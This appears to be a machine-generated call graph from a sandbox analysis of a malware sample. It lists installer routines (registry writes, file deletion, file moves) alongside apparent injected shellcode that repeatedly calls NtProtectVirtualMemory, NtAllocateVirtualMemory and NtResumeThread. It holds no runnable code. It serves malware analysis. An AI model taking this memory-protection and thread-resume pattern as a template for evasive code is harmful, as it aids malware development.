19160->19164 19165 2c92735 19160->19165 19166 2c925fb 19160->19166 19167 2c929e9 19160->19167 19162 2c92aaf 19164->19167 19168 2c83e14 19164->19168 19188 2c92ab2 NtProtectVirtualMemory 19165->19188 19187 2c92ab2 NtProtectVirtualMemory 19166->19187 19167->19162 19189 2c92ab2 NtProtectVirtualMemory 19167->19189 19172 2c938bb NtResumeThread 19168->19172 19171 2c928bb 19173 2c87867 19172->19173 19174 2c879c6 19173->19174 19176 2c87b87 19173->19176 19175 2c87a13 19174->19175 19177 2c938bb NtResumeThread 19174->19177 19178 2c87b6a 19175->19178 19180 2c938bb NtResumeThread 19175->19180 19176->19161 19179 2c90bd1 3 API calls 19176->19179 19183 2c9010b 19176->19183 19177->19175 19181 2c900ff 19179->19181 19180->19178 19182 2c90306 3 API calls 19181->19182 19182->19183 19184 2c90306 3 API calls 19183->19184 19185 2c902cb 19184->19185 19186->19160 19187->19161 19188->19171 19189->19162 17363 2c84a71 17364 2c84a8a 17363->17364 17366 2c91b87 17364->17366 17367 2c91b8b 17366->17367 17370 2c91c29 17367->17370 17369 2c91d87 17369->17364 17384 2c8ac08 17370->17384 17371 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 17371->17384 17372 2c91ee3 GetPEB 17400 2c92ab2 NtProtectVirtualMemory 17372->17400 17374 2c92aaf 17374->17369 17376 2c929c2 17379 2c929e9 17376->17379 17380 2c83e14 17376->17380 17377 2c92735 17402 2c92ab2 NtProtectVirtualMemory 17377->17402 17378 2c925fb 17401 2c92ab2 NtProtectVirtualMemory 17378->17401 17379->17374 17403 2c92ab2 NtProtectVirtualMemory 17379->17403 17385 2c938bb NtResumeThread 17380->17385 17383 2c928bb 17383->17369 17384->17369 17384->17371 17384->17372 17384->17376 17384->17377 17384->17378 17384->17379 17387 2c87c20 17384->17387 17386 2c87867 17385->17386 17388 2c879c6 17386->17388 17390 2c87b87 17386->17390 17387->17369 17389 2c87a13 17388->17389 17391 2c938bb NtResumeThread 17388->17391 17392 2c87b6a 17389->17392 17394 2c938bb NtResumeThread 17389->17394 17390->17387 17393 2c90bd1 3 API calls 17390->17393 17397 2c9010b 17390->17397 17391->17389 17392->17369 17395 2c900ff 17393->17395 17394->17392 17396 2c90306 3 API calls 17395->17396 17396->17397 17398 2c90306 3 API calls 17397->17398 17399 2c902cb 17398->17399 17399->17369 17400->17384 17401->17387 17402->17383 17403->17374 18031 2c87672 18032 2c876a2 18031->18032 18035 2c876dd 18032->18035 18034 2c876da 18036 2c83e14 18035->18036 18036->18035 18037 2c938bb NtResumeThread 18036->18037 18038 2c87867 18037->18038 18039 2c879c6 18038->18039 18042 2c87b87 18038->18042 18041 2c87a13 18039->18041 18043 2c938bb NtResumeThread 18039->18043 18040 2c87c20 18040->18034 18044 2c87b6a 18041->18044 18046 2c938bb NtResumeThread 18041->18046 18042->18040 18045 2c90bd1 3 API calls 18042->18045 18049 2c9010b 18042->18049 18043->18041 18044->18034 18047 2c900ff 18045->18047 18046->18044 18048 2c90306 3 API calls 18047->18048 18048->18049 18050 2c90306 3 API calls 18049->18050 18051 2c902cb 18050->18051 18051->18034 17405 2c8f875 17406 2c8f8cc CreateFileA 17405->17406 17408 2c90063 17405->17408 17406->17408 17409 2c90bd1 3 API calls 17408->17409 17412 2c9010b 17408->17412 17410 2c900ff 17409->17410 17411 2c90306 3 API calls 17410->17411 17411->17412 17413 2c90306 3 API calls 17412->17413 17414 2c902cb 17413->17414 18058 2c86a77 18059 2c86b88 18058->18059 18070 2c86c09 18059->18070 18061 2c8f3bd 18101 2c869be 18061->18101 18071 2c911b1 4 API calls 18070->18071 18085 2c86c35 18071->18085 18072 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 18072->18085 18073 2c91ee3 GetPEB 18114 2c92ab2 NtProtectVirtualMemory 18073->18114 18075 2c92aaf 18075->18061 18077 2c929c2 18080 2c929e9 18077->18080 18081 2c83e14 18077->18081 18078 2c92735 18116 2c92ab2 NtProtectVirtualMemory 18078->18116 18079 2c925fb 18115 2c92ab2 NtProtectVirtualMemory 18079->18115 18080->18075 18117 2c92ab2 NtProtectVirtualMemory 18080->18117 18086 2c938bb NtResumeThread 18081->18086 18084 2c928bb 18084->18061 18085->18061 18085->18072 18085->18073 18085->18077 18085->18078 18085->18079 18085->18080 18088 2c87c20 18085->18088 18087 2c87867 18086->18087 18089 2c879c6 18087->18089 18091 2c87b87 18087->18091 18088->18061 18090 2c87a13 18089->18090 18092 2c938bb NtResumeThread 18089->18092 18093 2c87b6a 18090->18093 18095 2c938bb NtResumeThread 18090->18095 18091->18088 18094 2c90bd1 3 API calls 18091->18094 18098 2c9010b 18091->18098 18092->18090 18093->18061 18096 2c900ff 18094->18096 18095->18093 18097 2c90306 3 API calls 18096->18097 18097->18098 18099 2c90306 3 API calls 18098->18099 18100 2c902cb 18099->18100 18100->18061 18102 2c911b1 4 API calls 18101->18102 18103 2c869f0 18102->18103 18104 2c86c09 5 API calls 18103->18104 18105 2c8f3bd 18104->18105 18106 2c869be 7 API calls 18105->18106 18107 2c8f482 18106->18107 18108 2c86dae 4 API calls 18107->18108 18109 2c8f57d 18108->18109 18110 2c90063 3 API calls 18109->18110 18111 2c8f698 18110->18111 18112 2c8f6f5 6 API calls 18111->18112 18113 2c8fa60 18112->18113 18114->18085 18115->18088 18116->18084 18117->18075 16450 402482 16451 402d3e 17 API calls 16450->16451 16452 402494 16451->16452 16453 402d3e 17 API calls 16452->16453 16454 40249e 16453->16454 16467 402dce 16454->16467 16457 402bc2 16458 4024d6 16462 4024e2 16458->16462 16471 402d1c 16458->16471 16459 402d3e 17 API calls 16463 4024cc lstrlenW 16459->16463 16461 402501 RegSetValueExW 16465 402517 RegCloseKey 16461->16465 16462->16461 16474 40324c 16462->16474 16463->16458 16465->16457 16468 402de9 16467->16468 16494 4062ac 16468->16494 16472 40644e 17 API calls 16471->16472 16473 402d31 16472->16473 16473->16462 16476 403265 16474->16476 16475 403293 16498 403467 16475->16498 16476->16475 16501 40347d SetFilePointer 16476->16501 16480 403400 16482 403442 16480->16482 16487 403404 16480->16487 16481 4032b0 GetTickCount 16483 4033ea 16481->16483 16490 4032ff 16481->16490 16485 403467 ReadFile 16482->16485 16483->16461 16484 403467 ReadFile 16484->16490 16485->16483 16486 403467 ReadFile 16486->16487 16487->16483 16487->16486 16488 405fb9 WriteFile 16487->16488 16488->16487 16489 403355 GetTickCount 16489->16490 16490->16483 16490->16484 16490->16489 16491 40337a MulDiv wsprintfW 16490->16491 16493 405fb9 WriteFile 16490->16493 16492 405479 24 API calls 16491->16492 16492->16490 16493->16490 16495 4062bb 16494->16495 16496 4062c6 RegCreateKeyExW 16495->16496 16497 4024ae 16495->16497 16496->16497 16497->16457 16497->16458 16497->16459 16499 405f8a ReadFile 16498->16499 16500 40329e 16499->16500 16500->16480 16500->16481 16500->16483 16501->16475 16766 402889 16767 402890 16766->16767 16769 402b0d 16766->16769 16768 402d1c 17 API calls 16767->16768 16770 402897 16768->16770 16771 4028a6 SetFilePointer 16770->16771 16771->16769 16772 4028b6 16771->16772 16774 406358 wsprintfW 16772->16774 16774->16769 18132 2c89e03 18146 2c89d73 18132->18146 18133 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 18133->18146 18134 2c91ee3 GetPEB 18162 2c92ab2 NtProtectVirtualMemory 18134->18162 18136 2c92aaf 18138 2c929c2 18141 2c929e9 18138->18141 18142 2c83e14 18138->18142 18139 2c92735 18164 2c92ab2 NtProtectVirtualMemory 18139->18164 18140 2c925fb 18163 2c92ab2 NtProtectVirtualMemory 18140->18163 18141->18136 18165 2c92ab2 NtProtectVirtualMemory 18141->18165 18147 2c938bb NtResumeThread 18142->18147 18145 2c928bb 18146->18133 18146->18134 18146->18138 18146->18139 18146->18140 18146->18141 18149 2c83dc0 18146->18149 18148 2c87867 18147->18148 18150 2c879c6 18148->18150 18152 2c87b87 18148->18152 18151 2c87a13 18150->18151 18153 2c938bb NtResumeThread 18150->18153 18154 2c87b6a 18151->18154 18156 2c938bb NtResumeThread 18151->18156 18152->18149 18155 2c90bd1 3 API calls 18152->18155 18159 2c9010b 18152->18159 18153->18151 18157 2c900ff 18155->18157 18156->18154 18158 2c90306 3 API calls 18157->18158 18158->18159 18160 2c90306 3 API calls 18159->18160 18161 2c902cb 18160->18161 18162->18146 18163->18149 18164->18145 18165->18136 16778 403e8e 16779 403fe1 16778->16779 16780 403ea6 16778->16780 16782 403ff2 GetDlgItem GetDlgItem 16779->16782 16783 404032 16779->16783 16780->16779 16781 403eb2 16780->16781 16784 403ed0 16781->16784 16785 403ebd SetWindowPos 16781->16785 16849 404367 16782->16849 16787 40408c 16783->16787 16795 401389 2 API calls 16783->16795 16789 403ed5 ShowWindow 16784->16789 16790 403eed 16784->16790 16785->16784 16788 4043b3 SendMessageW 16787->16788 16809 403fdc 16787->16809 16806 40409e 16788->16806 16789->16790 16792 403ef5 DestroyWindow 16790->16792 16793 403f0f 16790->16793 16791 40401c KiUserCallbackDispatcher 16794 40140b 2 API calls 16791->16794 16848 4042f0 16792->16848 16796 403f14 SetWindowLongW 16793->16796 16797 403f25 16793->16797 16794->16783 16798 404064 16795->16798 16796->16809 16801 403f31 GetDlgItem 16797->16801 16802 403fce 16797->16802 16798->16787 16803 404068 SendMessageW 16798->16803 16799 40140b 2 API calls 16799->16806 16800 4042f2 DestroyWindow EndDialog 16800->16848 16807 403f61 16801->16807 16808 403f44 SendMessageW IsWindowEnabled 16801->16808 16858 4043ce 16802->16858 16803->16809 16805 404321 ShowWindow 16805->16809 16806->16799 16806->16800 16806->16809 16810 40644e 17 API calls 16806->16810 16816 404367 18 API calls 16806->16816 16823 404367 18 API calls 16806->16823 16839 404232 DestroyWindow 16806->16839 16811 403f66 16807->16811 16812 403f6e 16807->16812 16813 403fb5 SendMessageW 16807->16813 16814 403f81 16807->16814 16808->16807 16808->16809 16810->16806 16855 404340 16811->16855 16812->16811 16812->16813 16813->16802 16817 403f89 16814->16817 16818 403f9e 16814->16818 16816->16806 16820 40140b 2 API calls 16817->16820 16821 40140b 2 API calls 16818->16821 16819 403f9c 16819->16802 16820->16811 16822 403fa5 16821->16822 16822->16802 16822->16811 16824 404119 GetDlgItem 16823->16824 16825 404136 ShowWindow KiUserCallbackDispatcher 16824->16825 16826 40412e 16824->16826 16852 404389 KiUserCallbackDispatcher 16825->16852 16826->16825 16828 404160 EnableWindow 16833 404174 16828->16833 16829 404179 GetSystemMenu EnableMenuItem SendMessageW 16830 4041a9 SendMessageW 16829->16830 16829->16833 16830->16833 16832 403e6f 18 API calls 16832->16833 16833->16829 16833->16832 16853 40439c SendMessageW 16833->16853 16854 406411 lstrcpynW 16833->16854 16835 4041d8 lstrlenW 16836 40644e 17 API calls 16835->16836 16837 4041ee SetWindowTextW 16836->16837 16838 401389 2 API calls 16837->16838 16838->16806 16840 40424c CreateDialogParamW 16839->16840 16839->16848 16841 40427f 16840->16841 16840->16848 16842 404367 18 API calls 16841->16842 16843 40428a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 16842->16843 16844 401389 2 API calls 16843->16844 16845 4042d0 16844->16845 16845->16809 16846 4042d8 ShowWindow 16845->16846 16847 4043b3 SendMessageW 16846->16847 16847->16848 16848->16805 16848->16809 16850 40644e 17 API calls 16849->16850 16851 404372 SetDlgItemTextW 16850->16851 16851->16791 16852->16828 16853->16833 16854->16835 16856 404347 16855->16856 16857 40434d SendMessageW 16855->16857 16856->16857 16857->16819 16859 404491 16858->16859 16860 4043e6 GetWindowLongW 16858->16860 16859->16809 16860->16859 16861 4043fb 16860->16861 16861->16859 16862 404428 GetSysColor 16861->16862 16863 40442b 16861->16863 16862->16863 16864 404431 SetTextColor 16863->16864 16865 40443b SetBkMode 16863->16865 16864->16865 16866 404453 GetSysColor 16865->16866 16867 404459 16865->16867 16866->16867 16868 404460 SetBkColor 16867->16868 16869 40446a 16867->16869 16868->16869 16869->16859 16870 404484 CreateBrushIndirect 16869->16870 16871 40447d DeleteObject 16869->16871 16870->16859 16871->16870 18227 2c8a62c 18247 2c8a5f8 18227->18247 18228 2c90bd1 3 API calls 18229 2c900ff 18228->18229 18230 2c90306 3 API calls 18229->18230 18231 2c9010b 18230->18231 18233 2c90306 3 API calls 18231->18233 18232 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 18232->18247 18234 2c902cb 18233->18234 18235 2c91ee3 GetPEB 18257 2c92ab2 NtProtectVirtualMemory 18235->18257 18237 2c92aaf 18239 2c929c2 18242 2c929e9 18239->18242 18243 2c83e14 18239->18243 18240 2c92735 18259 2c92ab2 NtProtectVirtualMemory 18240->18259 18241 2c925fb 18258 2c92ab2 NtProtectVirtualMemory 18241->18258 18242->18237 18260 2c92ab2 NtProtectVirtualMemory 18242->18260 18248 2c938bb NtResumeThread 18243->18248 18246 2c928bb 18247->18232 18247->18235 18247->18239 18247->18240 18247->18241 18247->18242 18250 2c87b87 18247->18250 18251 2c87c20 18247->18251 18249 2c87867 18248->18249 18249->18250 18252 2c879c6 18249->18252 18250->18228 18250->18231 18250->18251 18253 2c87a13 18252->18253 18254 2c938bb NtResumeThread 18252->18254 18255 2c87b6a 18253->18255 18256 2c938bb NtResumeThread 18253->18256 18254->18253 18256->18255 18257->18247 18258->18251 18259->18246 18260->18237 19324 2c8a03e 19326 2c8a0b0 19324->19326 19330 2c8ac08 19324->19330 19325 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 19325->19330 19327 2c91ee3 GetPEB 19355 2c92ab2 NtProtectVirtualMemory 19327->19355 19329 2c929e9 19331 2c92aaf 19329->19331 19358 2c92ab2 NtProtectVirtualMemory 19329->19358 19330->19325 19330->19327 19330->19329 19333 2c929c2 19330->19333 19334 2c92735 19330->19334 19335 2c925fb 19330->19335 19342 2c87c20 19330->19342 19333->19329 19339 2c83e14 19333->19339 19357 2c92ab2 NtProtectVirtualMemory 19334->19357 19356 2c92ab2 NtProtectVirtualMemory 19335->19356 19338 2c928bb 19340 2c938bb NtResumeThread 19339->19340 19341 2c87867 19340->19341 19343 2c879c6 19341->19343 19345 2c87b87 19341->19345 19344 2c87a13 19343->19344 19346 2c938bb NtResumeThread 19343->19346 19347 2c87b6a 19344->19347 19349 2c938bb NtResumeThread 19344->19349 19345->19342 19348 2c90bd1 3 API calls 19345->19348 19352 2c9010b 19345->19352 19346->19344 19350 2c900ff 19348->19350 19349->19347 19351 2c90306 3 API calls 19350->19351 19351->19352 19353 2c90306 3 API calls 19352->19353 19354 2c902cb 19353->19354 19355->19330 19356->19342 19357->19338 19358->19331 16176 401941 16177 401943 16176->16177 16182 402d3e 16177->16182 16183 402d4a 16182->16183 16228 40644e 16183->16228 16186 401948 16188 405b23 16186->16188 16270 405dee 16188->16270 16191 405b62 16197 405c8d 16191->16197 16284 406411 lstrcpynW 16191->16284 16192 405b4b DeleteFileW 16198 401951 16192->16198 16194 405b88 16195 405b9b 16194->16195 16196 405b8e lstrcatW 16194->16196 16285 405d32 lstrlenW 16195->16285 16199 405ba1 16196->16199 16197->16198 16313 40676f FindFirstFileW 16197->16313 16202 405bb1 lstrcatW 16199->16202 16203 405ba7 16199->16203 16205 405bbc lstrlenW FindFirstFileW 16202->16205 16203->16202 16203->16205 16207 405c82 16205->16207 16226 405bde 16205->16226 16206 405cab 16316 405ce6 lstrlenW CharPrevW 16206->16316 16207->16197 16210 405c65 FindNextFileW 16213 405c7b FindClose 16210->16213 16210->16226 16211 405adb 5 API calls 16214 405cbd 16211->16214 16213->16207 16215 405cc1 16214->16215 16216 405cd7 16214->16216 16215->16198 16219 405479 24 API calls 16215->16219 16218 405479 24 API calls 16216->16218 16218->16198 16221 405cce 16219->16221 16220 405b23 60 API calls 16220->16226 16222 4061d7 36 API calls 16221->16222 16224 405cd5 16222->16224 16223 405479 24 API calls 16223->16210 16224->16198 16226->16210 16226->16220 16226->16223 16289 406411 lstrcpynW 16226->16289 16290 405adb 16226->16290 16298 405479 16226->16298 16309 4061d7 MoveFileExW 16226->16309 16243 40645b 16228->16243 16229 4066a6 16230 402d6b 16229->16230 16261 406411 lstrcpynW 16229->16261 16230->16186 16245 4066c0 16230->16245 16232 406674 lstrlenW 16232->16243 16235 40644e 10 API calls 16235->16232 16237 406589 GetSystemDirectoryW 16237->16243 16238 40659c GetWindowsDirectoryW 16238->16243 16239 4066c0 5 API calls 16239->16243 16240 40644e 10 API calls 16240->16243 16241 406617 lstrcatW 16241->16243 16242 4065d0 SHGetSpecialFolderLocation 16242->16243 16244 4065e8 SHGetPathFromIDListW CoTaskMemFree 16242->16244 16243->16229 16243->16232 16243->16235 16243->16237 16243->16238 16243->16239 16243->16240 16243->16241 16243->16242 16254 4062df 16243->16254 16259 406358 wsprintfW 16243->16259 16260 406411 lstrcpynW 16243->16260 16244->16243 16252 4066cd 16245->16252 16246 406743 16247 406748 CharPrevW 16246->16247 16249 406769 16246->16249 16247->16246 16248 406736 CharNextW 16248->16246 16248->16252 16249->16186 16251 406722 CharNextW 16251->16252 16252->16246 16252->16248 16252->16251 16253 406731 CharNextW 16252->16253 16266 405d13 16252->16266 16253->16248 16262 40627e 16254->16262 16257 406313 RegQueryValueExW RegCloseKey 16258 406343 16257->16258 16258->16243 16259->16243 16260->16243 16261->16230 16263 40628d 16262->16263 16264 406291 16263->16264 16265 406296 RegOpenKeyExW 16263->16265 16264->16257 16264->16258 16265->16264 16267 405d19 16266->16267 16268 405d2f 16267->16268 16269 405d20 CharNextW 16267->16269 16268->16252 16269->16267 16319 406411 lstrcpynW 16270->16319 16272 405dff 16320 405d91 CharNextW CharNextW 16272->16320 16274 405b43 16274->16191 16274->16192 16276 4066c0 5 API calls 16282 405e15 16276->16282 16277 405e46 lstrlenW 16278 405e51 16277->16278 16277->16282 16280 405ce6 3 API calls 16278->16280 16279 40676f 2 API calls 16279->16282 16281 405e56 GetFileAttributesW 16280->16281 16281->16274 16282->16274 16282->16277 16282->16279 16283 405d32 2 API calls 16282->16283 16283->16277 16284->16194 16286 405d40 16285->16286 16287 405d52 16286->16287 16288 405d46 CharPrevW 16286->16288 16287->16199 16288->16286 16288->16287 16289->16226 16326 405ee2 GetFileAttributesW 16290->16326 16293 405b08 16293->16226 16294 405af6 RemoveDirectoryW 16296 405b04 16294->16296 16295 405afe DeleteFileW 16295->16296 16296->16293 16297 405b14 SetFileAttributesW 16296->16297 16297->16293 16299 405494 16298->16299 16308 405536 16298->16308 16300 4054b0 lstrlenW 16299->16300 16301 40644e 17 API calls 16299->16301 16302 4054d9 16300->16302 16303 4054be lstrlenW 16300->16303 16301->16300 16305 4054ec 16302->16305 16306 4054df SetWindowTextW 16302->16306 16304 4054d0 lstrcatW 16303->16304 16303->16308 16304->16302 16307 4054f2 SendMessageW SendMessageW SendMessageW 16305->16307 16305->16308 16306->16305 16307->16308 16308->16226 16310 4061f8 16309->16310 16311 4061eb 16309->16311 16310->16226 16329 40605d 16311->16329 16314 405ca7 16313->16314 16315 406785 FindClose 16313->16315 16314->16198 16314->16206 16315->16314 16317 405d02 lstrcatW 16316->16317 16318 405cb1 16316->16318 16317->16318 16318->16211 16319->16272 16321 405dae 16320->16321 16323 405dc0 16320->16323 16321->16323 16324 405dbb CharNextW 16321->16324 16322 405de4 16322->16274 16322->16276 16323->16322 16325 405d13 CharNextW 16323->16325 16324->16322 16325->16323 16327 405ae7 16326->16327 16328 405ef4 SetFileAttributesW 16326->16328 16327->16293 16327->16294 16327->16295 16328->16327 16330 4060b3 GetShortPathNameW 16329->16330 16331 40608d 16329->16331 16333 4061d2 16330->16333 16334 4060c8 16330->16334 16356 405f07 GetFileAttributesW CreateFileW 16331->16356 16333->16310 16334->16333 16336 4060d0 wsprintfA 16334->16336 16335 406097 CloseHandle GetShortPathNameW 16335->16333 16337 4060ab 16335->16337 16338 40644e 17 API calls 16336->16338 16337->16330 16337->16333 16339 4060f8 16338->16339 16357 405f07 GetFileAttributesW CreateFileW 16339->16357 16341 406105 16341->16333 16342 406114 GetFileSize GlobalAlloc 16341->16342 16343 406136 16342->16343 16344 4061cb CloseHandle 16342->16344 16358 405f8a ReadFile 16343->16358 16344->16333 16349 406155 lstrcpyA 16352 406177 16349->16352 16350 406169 16351 405e6c 4 API calls 16350->16351 16351->16352 16353 4061ae SetFilePointer 16352->16353 16365 405fb9 WriteFile 16353->16365 16356->16335 16357->16341 16359 405fa8 16358->16359 16359->16344 16360 405e6c lstrlenA 16359->16360 16361 405ead lstrlenA 16360->16361 16362 405e86 lstrcmpiA 16361->16362 16364 405eb5 16361->16364 16363 405ea4 CharNextA 16362->16363 16362->16364 16363->16361 16364->16349 16364->16350 16366 405fd7 GlobalFree 16365->16366 16366->16344 19373 402b43 19374 406806 5 API calls 19373->19374 19375 402b4a 19374->19375 19376 402d3e 17 API calls 19375->19376 19377 402b53 19376->19377 19378 402b57 IIDFromString 19377->19378 19380 402b8e 19377->19380 19379 402b66 19378->19379 19378->19380 19379->19380 19383 406411 lstrcpynW 19379->19383 19382 402b83 CoTaskMemFree 19382->19380 19383->19382 17110 40175c 17111 402d3e 17 API calls 17110->17111 17112 401763 17111->17112 17113 405f36 2 API calls 17112->17113 17114 40176a 17113->17114 17115 405f36 2 API calls 17114->17115 17115->17114 18365 401563 18366 402b08 18365->18366 18369 406358 wsprintfW 18366->18369 18368 402b0d 18369->18368 18380 401968 18381 402d1c 17 API calls 18380->18381 18382 40196f 18381->18382 18383 402d1c 17 API calls 18382->18383 18384 40197c 18383->18384 18385 402d3e 17 API calls 18384->18385 18386 401993 lstrlenW 18385->18386 18388 4019a4 18386->18388 18387 4019e5 18388->18387 18392 406411 lstrcpynW 18388->18392 18390 4019d5 18390->18387 18391 4019da lstrlenW 18390->18391 18391->18387 18392->18390 17201 40176f 17202 402d3e 17 API calls 17201->17202 17203 401776 17202->17203 17204 401796 17203->17204 17205 40179e 17203->17205 17240 406411 lstrcpynW 17204->17240 17241 406411 lstrcpynW 17205->17241 17208 40179c 17211 4066c0 5 API calls 17208->17211 17209 4017a9 17210 405ce6 3 API calls 17209->17210 17212 4017af lstrcatW 17210->17212 17214 4017bb 17211->17214 17212->17208 17213 40676f 2 API calls 17213->17214 17214->17213 17215 405ee2 2 API calls 17214->17215 17217 4017cd CompareFileTime 17214->17217 17218 40188d 17214->17218 17220 401864 17214->17220 17223 406411 lstrcpynW 17214->17223 17227 40644e 17 API calls 17214->17227 17235 405a77 MessageBoxIndirectW 17214->17235 17239 405f07 GetFileAttributesW CreateFileW 17214->17239 17215->17214 17217->17214 17219 405479 24 API calls 17218->17219 17221 401897 17219->17221 17222 405479 24 API calls 17220->17222 17229 401879 17220->17229 17224 40324c 31 API calls 17221->17224 17222->17229 17223->17214 17225 4018aa 17224->17225 17226 4018be SetFileTime 17225->17226 17228 4018d0 CloseHandle 17225->17228 17226->17228 17227->17214 17228->17229 17230 4018e1 17228->17230 17231 4018e6 17230->17231 17232 4018f9 17230->17232 17233 40644e 17 API calls 17231->17233 17234 40644e 17 API calls 17232->17234 17236 4018ee lstrcatW 17233->17236 17237 401901 17234->17237 17235->17214 17236->17237 17237->17229 17238 405a77 MessageBoxIndirectW 17237->17238 17238->17229 17239->17214 17240->17208 17241->17209 17242 401573 17243 401583 ShowWindow 17242->17243 17244 40158c 17242->17244 17243->17244 17245 402bc2 17244->17245 17246 40159a ShowWindow 17244->17246 17246->17245 19511 2c8a58a 19512 2c8a759 GetPEB 19511->19512 19513 2c8a5a1 GetPEB 19511->19513 19515 2c87c20 19512->19515 19522 2c8a5f8 19513->19522 19514 2c87b87 19514->19515 19516 2c90bd1 3 API calls 19514->19516 19520 2c9010b 19514->19520 19517 2c900ff 19516->19517 19519 2c90306 3 API calls 19517->19519 19518 2c90063 GetPEB NtProtectVirtualMemory NtResumeThread 19518->19522 19519->19520 19521 2c90306 3 API calls 19520->19521 19523 2c902cb 19521->19523 19522->19514 19522->19515 19522->19518 19524 2c91ee3 GetPEB 19522->19524 19526 2c9262e 19522->19526 19527 2c929e9 19522->19527 19530 2c929c2 19522->19530 19531 2c92735 19522->19531 19532 2c925fb 19522->19532 19544 2c92ab2 NtProtectVirtualMemory 19524->19544 19528 2c92aaf 19527->19528 19547 2c92ab2 NtProtectVirtualMemory 19527->19547 19530->19527 19533 2c83e14 19530->19533 19546 2c92ab2 NtProtectVirtualMemory 19531->19546 19545 2c92ab2 NtProtectVirtualMemory 19532->19545 19537 2c938bb NtResumeThread 19533->19537 19536 2c928bb 19538 2c87867 19537->19538 19538->19514 19539 2c879c6 19538->19539 19540 2c87a13 19539->19540 19541 2c938bb NtResumeThread 19539->19541 19542 2c87b6a 19540->19542 19543 2c938bb NtResumeThread 19540->19543 19541->19540 19543->19542 19544->19522 19545->19526 19546->19536 19547->19528 18455 40190c 18456 401943 18455->18456 18457 402d3e 17 API calls 18456->18457 18458 401948 18457->18458 18459 405b23 67 API calls 18458->18459 18460 401951 18459->18460 18470 2c8779f 18471 2c83e14 18470->18471 18472 2c938bb NtResumeThread 18471->18472 18473 2c87867 18472->18473 18474 2c879c6 18473->18474 18477 2c87b87 18473->18477 18476 2c87a13 18474->18476 18478 2c938bb NtResumeThread 18474->18478 18475 2c87c20 18479 2c87b6a 18476->18479 18481 2c938bb NtResumeThread 18476->18481 18477->18475 18480 2c90bd1 3 API calls 18477->18480 18484 2c9010b 18477->18484 18478->18476 18482 2c900ff 18480->18482 18481->18479 18483 2c90306 3 API calls 18482->18483 18483->18484 18485 2c90306 3 API calls 18484->18485 18486 2c902cb 18485->18486 17124 402522 17125 402d7e 17 API calls 17124->17125 17126 40252c 17125->17126 17127 402d3e 17 API calls 17126->17127 17128 402535 17127->17128 17129 402540 RegQueryValueExW 17128->17129 17132 402925 17128->17132 17130 402560 17129->17130 17131 402566 RegCloseKey 17129->17131 17130->17131 17135 406358 wsprintfW 17130->17135 17131->17132 17135->17131 17297 2c911b1 17298 2c911c5 17297->17298 17302 2c91392 17297->17302 17303 2c90063 17298->17303 17304 2c900a5 17303->17304 17305 2c9010b 17304->17305 17341 2c90bd1 17304->17341 17311 2c90306 17305->17311 17307 2c900ff 17308 2c90306 3 API calls 17307->17308 17308->17305 17310 2c902cb NtAllocateVirtualMemory 17310->17302 17316 2c8ac08 17311->17316 17312 2c87c20 17312->17310 17313 2c90063 NtProtectVirtualMemory NtResumeThread 17313->17316 17314 2c91ee3 GetPEB 17359 2c92ab2 NtProtectVirtualMemory 17314->17359 17316->17310 17316->17312 17316->17313 17316->17314 17317 2c929e9 17316->17317 17320 2c929c2 17316->17320 17321 2c925fb 17316->17321 17322 2c92735 17316->17322 17318 2c92aaf 17317->17318 17362 2c92ab2 NtProtectVirtualMemory 17317->17362 17318->17310 17320->17317 17323 2c83e14 17320->17323 17360 2c92ab2 NtProtectVirtualMemory 17321->17360 17361 2c92ab2 NtProtectVirtualMemory 17322->17361 17327 2c938bb NtResumeThread 17323->17327 17326 2c928bb 17326->17310 17328 2c87867 17327->17328 17329 2c879c6 17328->17329 17331 2c87b87 17328->17331 17330 2c87a13 17329->17330 17332 2c938bb NtResumeThread 17329->17332 17333 2c87b6a 17330->17333 17335 2c938bb NtResumeThread 17330->17335 17331->17312 17334 2c90bd1 2 API calls 17331->17334 17338 2c9010b 17331->17338 17332->17330 17333->17310 17336 2c900ff 17334->17336 17335->17333 17337 2c90306 2 API calls 17336->17337 17337->17338 17339 2c90306 2 API calls 17338->17339 17340 2c902cb 17339->17340 17340->17310 17342 2c83e14 17341->17342 17345 2c90be1 17341->17345 17343 2c938bb NtResumeThread 17342->17343 17344 2c87867 17343->17344 17346 2c879c6 17344->17346 17349 2c87b87 17344->17349 17345->17307 17348 2c87a13 17346->17348 17350 2c938bb NtResumeThread 17346->17350 17347 2c87c20 17347->17307 17351 2c87b6a 17348->17351 17353 2c938bb NtResumeThread 17348->17353 17349->17347 17352 2c90bd1 3 API calls 17349->17352 17356 2c9010b 17349->17356 17350->17348 17351->17307 17354 2c900ff 17352->17354 17353->17351 17355 2c90306 3 API calls 17354->17355 17355->17356 17357 2c90306 3 API calls 17356->17357 17358 2c902cb 17357->17358 17358->17307 17359->17316 17360->17312 17361->17326 17362->17318 16367 4015c1 16368 402d3e 17 API calls 16367->16368 16369 4015c8 16368->16369 16370 405d91 4 API calls 16369->16370 16384 4015d1 16370->16384 16371 401631 16373 401663 16371->16373 16374 401636 16371->16374 16372 405d13 CharNextW 16372->16384 16377 401423 24 API calls 16373->16377 16394 401423 16374->16394 16383 40165b 16377->16383 16381 40164a SetCurrentDirectoryW 16381->16383 16382 401617 GetFileAttributesW 16382->16384 16384->16371 16384->16372 16384->16382 16386 4059e2 16384->16386 16389 405948 CreateDirectoryW 16384->16389 16398 4059c5 CreateDirectoryW 16384->16398 16401 406806 GetModuleHandleA 16386->16401 16390 405995 16389->16390 16391 405999 GetLastError 16389->16391 16390->16384 16391->16390 16392 4059a8 SetFileSecurityW 16391->16392 16392->16390 16393 4059be GetLastError 16392->16393 16393->16390 16395 405479 24 API calls 16394->16395 16396 401431 16395->16396 16397 406411 lstrcpynW 16396->16397 16397->16381 16399 4059d9 GetLastError 16398->16399 16400 4059d5 16398->16400 16399->16400 16400->16384 16402 406822 16401->16402 16403 40682c GetProcAddress 16401->16403 16407 406796 GetSystemDirectoryW 16402->16407 16405 4059e9 16403->16405 16405->16384 16406 406828 16406->16403 16406->16405 16409 4067b8 wsprintfW LoadLibraryExW 16407->16409 16409->16406 18599 2c83b41 18621 2c91e4b 18599->18621 18601 2c83ba2 18602 2c90063 3 API calls 18601->18602 18603 2c91e4b 4 API calls 18601->18603 18605 2c83bf7 18601->18605 18602->18601 18603->18601 18604 2c83c14 18605->18604 18606 2c938bb NtResumeThread 18605->18606 18607 2c87867 18606->18607 